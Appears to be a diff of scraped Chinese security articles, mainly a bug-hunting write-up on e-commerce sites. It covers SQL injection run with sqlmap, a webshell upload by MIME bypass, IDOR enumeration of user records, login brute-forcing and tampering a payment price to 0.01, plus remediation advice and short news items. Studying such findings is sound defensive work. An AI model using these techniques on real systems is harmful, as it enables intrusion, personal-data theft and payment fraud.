本套课程在线学习(网盘地址,保存即可免费观看)地址:
https://pan.quark.cn/s/9df4d67e9a00
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0JJXjA8siccw6BvgTWZz4zGRh5icicfB50lMPRgTz7HhjDiaVJLAPmqG7SjSZpdwibOWd9o9fz77wib1bia3CHNJrIiccw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0JJXjA8siccw6BvgTWZz4zGRh5icicfB50lw7ZxadfJgTNaObialgVfiaIsgNDrSGxadd78Ted82ticdoJ3esgyVoziaQ/640?wx_fmt=png&from=appmsg "")
该内容转载自网络,仅供学习交流,勿作他用,如有侵权请联系删除。
个人微信ivu123ivu
**各 类 学 习 教 程 下 载 合 集**
https://pan.quark.cn/s/8c91ccb5a474
![](https://mmbiz.qpic.cn/sz_mmbiz_png/8H1dCzib3UibuuhdO7GMx4wqK5PQMWgr8pNaudBlYJUYXP6R6LcL0d3UYmPLoiajIXwaibhvlchGibgiaBGwMSwuq58g/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")

View File

@ -0,0 +1,335 @@
# 漏洞挖掘|电子商城类漏洞挖掘案例灵感复现
Z2O安全攻防 2024-11-19 13:17
**0x01 前言**
    电子商城购物系统我们每天都能接触到现在的商城系统大多数已经在小程序、APP方向去开发了因为灵活方便管理且开发难度不高当然现在WEB系统还很多我们本次会选几个SRC去浅挖一下那些电子商城系统存在的漏洞黑盒占多数其中有某电子商城白盒测试(历史漏洞),当然,在黑盒测试中,逻辑漏洞占大多数,像我们之前说过的:**命令执行和代码执行这种漏洞基本上只能去靠审代码因为需要拼接参数可能少一个参数甚至一个符号都RCE失败文件上传和SQL注入可能还能浅试一下**
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOe0QzwM83P2INIqlyOtcqiajW5TcBHjnQvH62Kr180yWAYy8qeAbicQOQ/640?wx_fmt=png&from=appmsg "")
*** 本文章仅供学习参考,完全仿真环境复现,禁止非法攻击,后果自负**
*** 如您认为文章有用,麻烦点个关注点赞并转发共同学习**
**0x02 漏洞挖掘**
**P1. 白盒-仿Tmall商城(历史漏洞)**
<table><thead><tr><th width="88.00000000000001"><span style="font-size: 15px;">机器名称</span></th><th width="324.33333333333326"><span style="font-size: 15px;">机器IP</span></th></tr></thead><tbody><tr><td width="159.33333333333334"><span style="font-size: 15px;">攻击机</span></td><td width="304.3333333333333"><span style="font-size: 15px;">172.16.1.50</span></td></tr><tr><td width="88.00000000000001"><span style="font-size: 15px;">靶机</span></td><td width="304.33333333333326"><span style="font-size: 15px;">172.16.1.204</span></td></tr></tbody></table>
**代码审计阶段**
    首先我们需要在攻击机内IDEA导入相关源代码因为是传统的spring框架搭建在pom.xml会看到使用的相关依赖有时候在这里可能会发现意想不到的收获比如老版本的框架等
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esS0NhicKh4yEb8I7h78WvTiaZVKjnqKV2W7HmO2SFWBxiaPevwrfVfptKBg/640?wx_fmt=png&from=appmsg "")
    然后在代码main目录中往下递归看有controller层相关的核心代码都在这里俗称MVC框架这个就是C
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSiboOQq2ibtBAWno54h023mbclic7MaCE7nCr1uolicohbmEibZnEVjfPgcA/640?wx_fmt=png&from=appmsg "")
    传统的代码审计方式肯定根据想挖掘的漏洞放心去查关键字符号等比如此处出现的SQL注入这里的数据库使用的是Mybatis我们全局搜索**${**关键字
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSJVHkhfJ1kqwvQEnd4yyVN5USqBnyKRXVFvajmINOtpml9vyvbzr4mQ/640?wx_fmt=png&from=appmsg "")
    像SQL语句一般定义在XML文件中主要找此类文件
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSI8CrgtibUD5Q2q8DXHZrgFexRp5Mm5wlbdv3UJ74nicILnIxjC0HZHHQ/640?wx_fmt=png&from=appmsg "")
   往上看CTRL跟进可疑位置dao层UserMapper进入相关java视图
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esS4o4giaf9XcX8Rs2Smf24NpHCkLr4qhZ8EI4CyrOAm0argYLm0fBBQKg/640?wx_fmt=png&from=appmsg "")
    继续跟进select来查看谁使用了这个函数
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSIuodASibNsmq6Liawu8hH0ISHdV1zQ15HVibw5Ik5icfKkYib0GNw7DciaPQ/640?wx_fmt=png&from=appmsg "")
    在UserServiceIMPI.java中定义了一个方法getList这个方法需要使用orderUtil继续跟进谁使用了getList方法
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSicvLIwdPCYEwh9ibvSMhflBRGELnRAib4mC3ia8PV9ZG25f4ae9SOd5URA/640?wx_fmt=png&from=appmsg "")
    跟进去后看到170行使用了orderUtil往上看定义中使用了ordeyBy和isDesc
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSCNPqEXRPpmib6foy61VwBMNzNtJpXicia43BUtHDZJZzIddGmzFaxMmjg/640?wx_fmt=png&from=appmsg "")
    跟进是可以看注释的但是这个在SQL语句中师傅们应该都知道什么意思
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSKML833qqUPC4ictiatiaP2RJ6ugjJicGI6iahV5d9b4hM1vkjcLtE2NpPtQ/640?wx_fmt=png&from=appmsg "")
    然后在上面的value处可以看到使用的url路径大概猜测是查询用户然后进行倒序处理之类的功能
**SQL注入实测**
    因为是后台漏洞,所有需要登录后台登录页面:
```
访问http://172.16.1.204:8087/tmall/admin 登录
```
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BO7kVq1YaIrhAvibobWlsZ3rDaOxHm9wUSjMD3Y8yrmWMl6EWyude4ETw/640?wx_fmt=png&from=appmsg "")
    在用户管理-查询时进行翻页在burp suite处会出现orderby参数
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOD4ibxNiaHZQ9uQ0kODIzaP1nsbFhxeXrG9rOT5K8JFxicB6JImStAR3nw/640?wx_fmt=png&from=appmsg "")
    给orderby赋值给1和99可以看到正常存在和报错信息说明SQL语句的执行
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOqMCU80LSQYoB1F3v9HxUKMaBIFOouqCKV1jzC0wLCOmx5ceQhEBJTA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOnBG9jFXARyPyh8UgchF7iaH2CozZeS50icpNmcCQNGHhvDtsL30vq6gA/640?wx_fmt=png&from=appmsg "")
    直接丢sqlmap去跑因为是后台漏洞可以指定cookie或直接保存数据包去跑
```
sqlmap -r 1.txt -p orderby --dbs
```
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOoBO7R1FBcAZrSxmjL5wfQdmpAl5ROYrpuPZZtLuaKdSNxeW2BpmliaA/640?wx_fmt=png&from=appmsg "")
**任意文件上传代码审计**
    在进行代码审计时搜索关键字比全篇通读较合适全片通读较为仔细但是比较浪费时间这里使用IDEA搜索到**UploadHandle**
有文件使用
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOoP2NcRrGdPkxVWibWorZnibjFVa3Ez1SPXia6Z3JQicj6iamicbtPiaLRgfSw/640?wx_fmt=png&from=appmsg "")
    然后经过跟进得知被调用处为后台头像上传处进行测试F12定位到头像处看到文件上传前端限制的文件类型
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOBp0Sv8Pj1KIoibqyXxbvLs9oSVmFGwweXiczltXPdr4bPGicoiaxJRsrCw/640?wx_fmt=png&from=appmsg "")
    上传一张正常图片可以上传成功然后使用冰蝎马上传通过更改mime绕过前端限制上传成功
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOHRLwzCicuJA0n7T6iamPCZuQOFsvezJcSS5ehicgInwSzdjWydF7eAaibQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOUu2KvwbsQKBolriaWuia0y4UlHKZRcSw8u7icCHtKDPibKOGLg1eakBMmg/640?wx_fmt=png&from=appmsg "")
    最后通过路径拼接,使用冰蝎连接成功,完成任意文件上传
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOp5z0Ns1l7lD4VOiaELHQ5dgZoPPhiab8OjnJhuDZzh0DDtK85ku7ncEA/640?wx_fmt=png&from=appmsg "")
    我们之前提到的SQL注入和任意文件上传在黑盒中挖掘出洞的概率远比代码执行和命令执行概率高可以自行试想一下把代码审计步骤去掉这些黑盒步骤是否也能做出来呢
**P2. 黑盒-某图书商城敏感信息泄露**
    这个是去年挖的一个漏洞,那时候刚做公众号没多久,不太会排版、写文以及脱敏框架,当时写的不是很细,现在在回头看看
**实战|记一次某企业网站的信息泄露漏洞挖掘**
    这是一个图书商城的漏洞,大概有二十年左右了,比较大的一个企业,很不可思议
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpO1qpcfNE2avU0B6vNzAp5iayZRV2VskpWTRCfpBovvicAPxHQ0ItUz1ugzbxxGdZ6hoR8dwQKUictiaw/640?wx_fmt=png&from=appmsg "")
    在这个商城中有一个商家板块我们通过商家主页可以看到在售商品通过插件可以看到使用的是PHP语言
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OsDmQF5QCVwPuqVo9DcibXSKNvXXG6yw0TbF4ibTW4fdQlAWd0BdtKNmA/640?wx_fmt=png&from=appmsg "")
    然后前端调用了js文件其中js中含有api链接这个api我们使他报错可以看到有点形似swagger的样子
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OSHbCZaDSiceicHV5HSponqmlGvlMf6s6u5bmkSQ0Wz1sa6pW75hgFL5w/640?wx_fmt=png&from=appmsg "")
    通过提取前端的一些api可以看到widget/ajax一类的应该是和商家信息有关因为在其它页面没有
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OXCF7I4OuCIVwDRunMYB3hlF6GVm9Fud5R37uLsqZW9r0pXLISI9Yyg/640?wx_fmt=png&from=appmsg "")
    其中呢ajax类似于接口文件后面跟的参数shopinfo也就是商品信息tpl更类似于二级栏目api就是调用类型在往后正常情况下每个接口需要跟一个shopid也就是商家店铺id别问我为啥知道的挖逻辑漏洞就是不断的拼接参数
    首先呢,它会鉴权,我们先登录,再去看
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1O0RzggRxgVQnvQQrw00pu2z09J17XQ2kC3OoYHL12DRuw1ic8SYJknUw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1Oe1lAoG92uuQiaOPnBQt90LqmmdFYVcrwbudIjlHCDQvQEBTv9JvB6PA/640?wx_fmt=png&from=appmsg "")
    依次遍历api接口并加shopid后找到商家泄露信息的api
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OwIAqIvk3yrvsGJ5KLPrvHV6Enlw2RA0Sog4JAZ2zZCibXfau783GT9A/640?wx_fmt=png&from=appmsg "")
    当时该API还泄露了商家的身份证号的我一激动直接去找平台客服了然后当时他们就修了后面漏洞就不认了说是正常功能泄露信息大概在几十万左右泄露信息个人姓名身份证号手机号小区住址邮箱等信息
    大概逻辑就是中间的一个API定义好后前端的用户浏览需要调用部分数据后端的商家版可能会调用全部数据平台为了省事直接用了同一个API
    这个大概是当时挖到比较快又比较严重的洞了可惜激动的把等级给降级了可怜的公益类型4库币
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OTu7vInk4icsujhz3r1qjFicicweDqZLE8OkYvsbeXjNfQrUKZkSTgd4IQ/640?wx_fmt=png&from=appmsg "")
**P3.APP-某票务购物平台多处SQL注入漏洞**
    没错,这还是一家上市公司,当然好像这走势凉了哈,跟闹着玩一样
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OqyWHMFL4KQquKiaVL65YBKqAVkQ2qvq9YzMuTEgxdHJF2qhomlvFWXA/640?wx_fmt=png&from=appmsg "")
    然后这个公司的某业务WEB站点下防御做的非常好所有地方该加密的都加密了确实手足无措![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuP4rt0Yc3o7b5Mia9xdtUjrpnWmBBgjVqxdicb8PtHB3dEXxHVH7QgGEAw/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
    不过好在经过信息搜集找到了APP但是没有用户注册通道一时间犯了难
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpO1qpcfNE2avU0B6vNzAp5iaq1uvcMI9Irpd0UUfCibTydMicETBs7IdAeNs3TZ1Q6K5FSIyCG0Dprug/640?wx_fmt=png&from=appmsg "")
    于是乎使用了魔法找到了一些账号密码然后登录成功APP可以在模拟器运行并且可以抓包不用在逆向什么的了
**1. 账号密码可爆破**
    首先就是登录页面传参是GET方式传参没有限制登录次数以及加密有爆破风险
```
/api/xxx/xxx/key=xxx&uname=xxx&pwd=123456
```
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPrjcmzgjg4TcrOQ6vzmh0sG0iaZkwHtDQXqq2Z2pKJzKJH3nQ1tibmAqg/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**2. 越权敏感信息遍历**
```
api/xxx/xxx.php?key=xxx&uid=xxx
```
    经过测试key值必须存在但非和用户有关无绑定联系只需按照顺序枚举uid即可越权浏览用户信息
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPCkPKADsn2hDacq2aRMRtxsjkeYn1CDx8zYty2cfyZBBzuvrluhYniaQ/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
    遍历后可以获取到用户:手机号,地址,部门,注册时间,邮箱等,大概有几万个信息
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPp0TdrIibvZ6IZECujq8QKTy2cXjpzoEWyZYCDjJYdAyHebiadicEcmJUg/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**3. 越权增删改查用户信息**
    首先先看用户个人信息修改页面抓取到API
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPAUc7VPnnoSHeWaqfsFAAZYoc7ib4EAIDRSXeaTshoOe1VmDEhaGXrnQ/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
    
继续使用api添加一个不规则数据添加成功判断只有前端进行规则匹配验证API没做过滤
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPxuMPwmaO2ZuuCuOt3aWCzdyhNm07Qzd9J97dPzYas12BKzeUvnTbCQ/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
    我们修改一下其他人的信息填写UID即可完成越权操作
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPIVcVtmNWHDG2eZj5p3F7ia5LjlYR8wnWqoiaZOP9FiaY2GHJU0DqYuibsw/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
    其它增删查同理也是抓取到相应的API即可完成
**4. 数据交互接口存在SQL注入**
```
sqlmap -u “xxx.com/api/xxx/xxx/key=1&uid=xxx” --batch --dbs
```
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPkWpCFqKb7zgIpoTMWNLGiakzZzy7ejg2G3ApdxwhK3lhlqicCgSVibL5w/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
****
    
最后我们整理一下修复建议:
```
1.
  首先关于登录页面可暴力破解建议对相关账号、IP等进行风控验证
  对相关的账号与密码value进行前端加密
2.
  关于越权造成的信息泄露建议以用户token进行鉴权
  比如jwt、token等格式给一个x分钟不操作退出账号等机制
  其次可以给每个操作数据包加入sign防止重放攻击
3.
  关于越权造成的增删改查,建议首先从账号进行判断,先解决越权漏洞问题
  其次就是前端需要进行鉴别数据的真实性和危害性,哪怕是用正则表达式的方法
4.
  关于uid存在的SQL注入因为前端传入参数需要拿uid去数据库查询的
  使用的是MSSQL数据库判断大概SQL语句如下
  select * from user_tables where uid=$uid;
  未进行任何过滤被带入数据库造成的SQL注入
  建议使用预编译的方式进行SQL语句查询最好有黑名单字典比如敏感关键字等
```
**P4. 小程序-某电子商城小程序漏洞**
    一般情况下小程序是我们在挖掘企业漏洞时,在搜集资产的一部分,很少有专门去挖掘小程序漏洞的,因为小程序漏洞并不是很多,普遍的如下
```
1. 文件上传处-可能存在的任意文件上传漏洞
2. 数据交互处可能存在的SQL注入
3. 账户可能存在越权漏洞
4. 登录接口存在KEY、IV等泄露造成的逆向越权
5. 支付漏洞0元购、替换订单号、替换支付单号等
6. 通过反编译中前端源代码泄露的OSS及其它信息(现在不多了)
7. 通过小程序抓包引起的API地址泄露及未授权访问
```
    大概总的方向就这些(我遇到的漏洞就这些,当然也可能会有其它漏洞姿势)****
    这个是之前遇到的一个商城小程序漏洞出现的支付漏洞除了支付功能及接口在WEB站点没有其它功能一样除此之外不同的是小程序所有请求/响应包内容都被base64编码了
```
域名: target.custerm.com 开通会员功能,会员有专享福利
```
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BO5ibWgugbI7TRnQbQZ1sXKOTyk027pycuYQGu38zGTRJNA3GqorhzARw/640?wx_fmt=png&from=appmsg "")
    选好套餐以后价格是四万九左右吧对base64进行解码把所有关于价格value改为0.01元,放包即可
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMQpRS8zV6Nib7zHFib3iayYsIKIUGcJyWv2iaxb89ks0icIjt7HsicSy7tW6CrFeur4VdooWgqRzWXR5dg/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
    当然,因为现在系统第二天或者晚上都有财务核算,后面给自动退款了,现在漏洞已经修复了
![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BObCou2MHGg3aWacr0z6Mf0SvYPduaKol6VHgpjgia1c8IXFG7AUH7asw/640?wx_fmt=png&from=appmsg "")
**0x03 总结**
**关于电子商城类的漏洞,在漏洞挖掘时主要侧重如下方面**
```
对于代码审计-白盒
白盒审计还是侧重owasp类型的漏洞传统8大漏洞+API测试等这个不用多说
侧重说黑盒测试
首先,我们知道它是商城系统,肯定以支付和商品为主
所以在挖掘时,先去看有无支付漏洞、关于支付漏洞大家可以去多看文章
其次就是有商品肯定有商家,关注是否存在商家信息泄露、越权的情况
有商家肯定有商家系统后台,搜集信息能否进入商家系统后台或系统存在的漏洞
有商家肯定有用户看能不能达到越权漏洞越权登录、越权信息泄露、订单号泄露、越权支付、XSS等
商城系统主要功能是什么是卖货这个时候多注意SQL注入和文件上传的漏洞
会出现在哪些地方?
    多注意支付接口,登录接口,商品接口,个人头像,商品图片上传等等一些在前端容易发现和容易测试的地方
    相对于其它漏洞,这两个还是比较容易挖的
在用户方面,多注意爆破、短信类型漏洞、注册登录类漏洞
现在大部分站点都使用vue+框架去建站了多关注API类型漏洞常出现swagger、springboot类等
```
建立了一个
src专项圈子
,内容包含**src漏洞知识库**
、**src挖掘技巧**
、**src视频教程**
等,一起学习赚赏金技巧,以及专属微信群一起挖洞
圈子专注于更新src相关
```
1、维护更新src专项漏洞知识库包含原理、挖掘技巧、实战案例
2、分享src优质视频课程
3、分享src挖掘技巧tips
4、小群一起挖洞
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOABrvjQvw6cnCXlwS05xyzHjx9JgU7j83aReoqqUbdpiaMX2HeudxqYg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOXg868PqXyjsACp9LhuEeyfB2kTZVOt5Pz48txg7ueRUvDdeefTNKdg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuYgNUapJqQxicbYTJoohoBK32iat5p76xlsgd6bdhZsdAgtNzPEv9CEOh96qgHK3ibHHBa4kRibjQeuibw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
图片
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuYrUoo5XZpxN9Inq87ic71D6aUeMdaWrKXgYYia2On8nMA7bqWDySa8odAq1a0kkp3WFgf0Zp0Eut0A/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuZDDDv3NsbJDuSicLzBbwVDCPFgbmiaJ4ibf4LRgafQDdYodOgakdpbU1H6XfFQCL81VTudGBv2WniaDA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "null")
图片
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugIx3z6YtXqmOkmp18nLD3bpyy8w4daHlAWQn4HiauibfBAk0mrh2qNlY8A/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
图片
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugI5tZcaxhZn1icWvbgupXzkwybR5pCzxge4SKxSM5z4s9kwOmvuI3cIkQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
图片
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOHgjJxnq1ibibJgVUx3LwCjZj62vygx8w6rxia1icmIWiax2YlP6S6LmlmlQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOApVm8H605qOibxia5DqPHfbWD6lmcweDjGv4DLl45waD068ugw2Iv2vg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOwldaSATYOh1WQpk1qz15rLxehOAn4aK7tdbSyNEuHDZpIISCtl6Q8w/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugIstia27YLJFBtC5icJO6gHLLgzRDqib6upI3BsVFfLL02w6Q8jIRRp0NJA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuYrUoo5XZpxN9Inq87ic71D6JWUFIwPbP7Au1PYLXTplb3bbFZFlaYDtXXTqPdzOO6iaFz8F7r8WUPw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,6 @@
# 漏洞预警Apache OFBiz远程代码执行漏洞(CVE-2024-47208)
威胁情报运营中心 矢安科技 2024-11-19 12:26
![](https://mmbiz.qpic.cn/mmbiz_png/U9q5QO5nvTS87BRxLicQDNdbt3kDF0PfMHFq2c2XIvdBC0PiavJvx5l3j6NQtJmUnlrf2LveMRadTfDk8O9dialXg/640?wx_fmt=png&from=appmsg "")

View File

@ -0,0 +1,6 @@
# 漏洞预警Palo Alto Networks PAN-OSS身份验证绕过等多个漏洞
威胁情报运营中心 矢安科技 2024-11-19 12:26
![](https://mmbiz.qpic.cn/mmbiz_png/U9q5QO5nvTS87BRxLicQDNdbt3kDF0PfM2jBhNFX0DkjfHoian2XshmicM2LqxuJYNNqiamuE2CZ1rH1L8PfljIuXw/640?wx_fmt=png&from=appmsg "")

View File

@ -1,10 +1,5 @@
# 美国饮用水系统存在300多个漏洞影响1.1亿人
老布 FreeBuf 2024-11-19 11:35
![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39uD8TzUAG6icPT99CvicxqoB0SwP2rAwZBuHBDcNNve8Pib49F7P26PogYNP8jclKbvmS6AhXyicVZ9A/640?wx_fmt=jpeg&from=appmsg "")
FreeBuf 商密君 2024-11-19 14:31
> 美国环境保护署EPA标记了300多个饮用水系统的安全漏洞这些系统为大约1.1亿人提供服务。
@ -13,7 +8,7 @@
近日美国环境保护署EPA监察长办公室OIG发布了一份研究报告在对美国1062个饮用水系统进行了安全性缺陷评估活动之后结果显示超过300个饮用水系统存在系统漏洞存在可能导致功能丧失、无法服务和用户信息泄露的风险。不安全的饮用水系统为1.1亿美国人提供服务。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39uD8TzUAG6icPT99CvicxqoBse5fFY24qpe6vJID3aqMLWbN5d0nubADskMPU9b5xzxIakSap6BYOw/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39uD8TzUAG6icPT99CvicxqoBse5fFY24qpe6vJID3aqMLWbN5d0nubADskMPU9b5xzxIakSap6BYOw/640?wx_fmt=jpeg&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
安全性缺陷评估涵盖了五个网络安全类别即电子邮件安全、IT卫生、漏洞、对抗性威胁和恶意活动并根据潜在影响对识别的漏洞从低到高进行评分。
@ -49,57 +44,35 @@ EPA还会为每个被调查对象绘制系统的数字足迹涵盖用于收
EPA也与美国网络安全和基础设施安全局(CISA)及美国联邦调查局(FBI)联合发布了一项网络安全实践指南,旨在帮助城市供水和废水处理领域的企业组织提高网络安全弹性和事件响应能力。
编辑:陈十九
FreeBuf粉丝交流群招新啦
审核:商密君
在这里,拓宽网安边界
**征文启事**
甲方安全建设干货;
乙方最新技术理念;
全球最新的网络安全资讯;
群内不定期开启各种抽奖活动;
FreeBuf盲盒、大象公仔......
扫码添加小蜜蜂微信回复「加群」,申请加入群聊
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
大家好,为了更好地促进同业间学术交流,商密君现开启征文活动,只要你对商用密码、网络安全、数据加密等有自己的独到见解和想法,都可以积极向商密君投稿,商密君一定将您的声音传递给更多的人。
![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/1HyKzSU2XXNcXmbiaiaCljdXpwzOEQ9QTBXMibM6rZTOnbTSwTmCXncQLria2vuLGxn8QPtznzBc0as8vBxWIjrWxQ/640?wx_fmt=jpeg "")
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
> https://www.securityweek.com/300-drinking-water-systems-in-us-exposed-to-disruptive-damaging-hacker-attacks/
来源FreeBuf
注:内容均来源于互联网,版权归作者所有,如有侵权,请联系告知,我们将尽快处理。
